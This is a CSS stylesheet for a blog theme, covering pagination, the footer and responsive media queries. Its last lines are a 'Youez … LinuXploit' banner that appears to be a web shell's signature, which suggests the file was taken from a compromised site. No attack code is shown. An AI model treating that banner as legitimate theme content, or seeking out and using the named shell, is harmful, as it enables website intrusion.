.navigation.pagination .nav-links .current{
	background-color: #F13446;
	padding: 13px;
	color: #ffffff;
}
.site-footer {
	position:absolute;
    bottom: 0%;
	right:0%;
    width: 100%;
    line-height: 30px;
}
.site-info {
text-align:center;
background-color:#ffffff;
float:right;
padding:0px 15px;
border-radius:4px 0 0 0;
}
.site-footer p {
display:inline-block;
font-size:12px;
padding-right:15px;
margin:0px;
margin-bottom:0px;
padding-bottom:0px;
color:#333333;
}
.site-footer p a {
color:#333333;
}
/*--------------------------------------------------------------
# Media Query
--------------------------------------------------------------*/
@media (min-width: 320px) and (max-width: 767px) {
	.site-header {
	max-height:unset;
	}
	.navbar-toggler {
	display:block;
	}
	.navbar-toggler-icon {
	color:#fff;
	font-size:24px;
	margin-top:12px;
	}
	.navbar-toggler:hover, 
	.navbar-toggler:focus,
	.navbar-toggler-icon:focus {
	outline:none;
	}
	.search-bar {
		padding: 0px 25px 0px 25px;
	}
	.post-content,
	.post-list,
	.sidebar,
	.social-networks {
	height: auto;
	max-width:100%;
	}
	.social-menu {
	margin-top:unset;
	text-align:center;
	margin-bottom:10px;
	}	
	.social-menu li {
	display:inline-block;
	}
	.social-menu li a {
	color:#ffffff;
	font-size:12px;
	text-transform: uppercase;
	text-align:center;
	display:block;
	padding: 6px;
	}
	.social-menu li a::before {
	font-size:18px;
	}
	.search-bar .search-form label {
    width: 74%;
	}
	.search-bar .search-form input.search-submit {
    	width: 26%;
	}	
	.post-list {
	padding:0px 0px;
	}	
	.post-list .single-post-list {
	padding: 10px;
	}		
	.single-post .post-content .post-thumbnail img {
	height:auto;
	}
	.no-results .search-form {
	max-width:100%;
	}	
	.search-form label {
	width:65%;
	}	
	.search-form input.search-submit {
	width:35%;
	}
	.single-post .post-content {
		padding:0px;
	}	
	.site-footer {
		position:relative;
	}	

}
@media (min-width: 768px) and (max-width: 1023px) {
	.navbar-toggler {
	display:block;
	}
	.navbar-toggler-icon {
    color: #fff;
    font-size: 24px;
    margin-top: 10px;
    text-align: right;
	}
	.navbar-toggler:hover, 
	.navbar-toggler:focus,
	.navbar-toggler-icon:focus {
	outline:none;
	}
	.site-header {
	max-height:unset;
	}
	.single-post .post-content .post-thumbnail img {
	height:auto;
	}	
	.social-networks {
	height: auto;
	max-width:100%;
	}
	.social-menu {
	margin-top:unset;
	text-align:center;
	margin-bottom:10px;
	}	
	.social-menu li {
	display:inline-block;
	}
	.social-menu li a {
	color:#ffffff;
	font-size:12px;
	text-transform: uppercase;
	text-align:center;
	display:block;
	padding: 6px;
	}
	.social-menu li a::before {
	font-size:18px;
	}
	.nav-link {
    padding: 0rem 1rem 0.5rem 1rem;
	font-size: 14px;	
	}
	.search-bar .search-form label {
		 width: 80%;
	}	
	.search-bar .search-form input.search-field {
		padding: 4px 14px;
		font-size: 16px;		
	}	
	.search-bar .search-form input.search-submit {
		width: 20%;
		padding: 6px 15px 5px 15px;
		font-size: 14px;
	}
	.single-post .post-content {
		padding:0px;
	}	
	.site-footer {
		position:relative;
	}	
	
	
}
@media (min-width: 1024px) and (max-width: 1199px) {
	.site-header {
	max-height:unset;
	}
	.social-networks {
	height: auto;
	max-width:100%;
	}
	.social-menu {
	margin-top:unset;
	text-align:center;
	margin-bottom:10px;
	}	
	.social-menu li {
	display:inline-block;
	}
	.social-menu li a {
	color:#ffffff;
	font-size:12px;
	text-transform: uppercase;
	text-align:center;
	display:block;
	padding: 6px;
	}
	.social-menu li a::before {
	font-size:18px;
	}
	.nav-link {
    padding: 0rem 1rem 0.5rem 1rem;
	font-size: 14px;	
	}
	.search-bar .search-form label {
		 width: 70%;
	}	
	.search-bar .search-form input.search-field {
		padding: 4px 14px;
		font-size: 16px;		
	}	
	.search-bar .search-form input.search-submit {
		width: 30%;
		padding: 6px 15px 5px 15px;
		font-size: 14px;
	}
	.post-content {
		padding: 0px 25px;
	}	
	.single-post .post-content {
		padding:0px 25px;
	}		
	.site-footer {
		position:relative;
	}	
	
}

Youez - 2016 - github.com/yon3zu
LinuXploit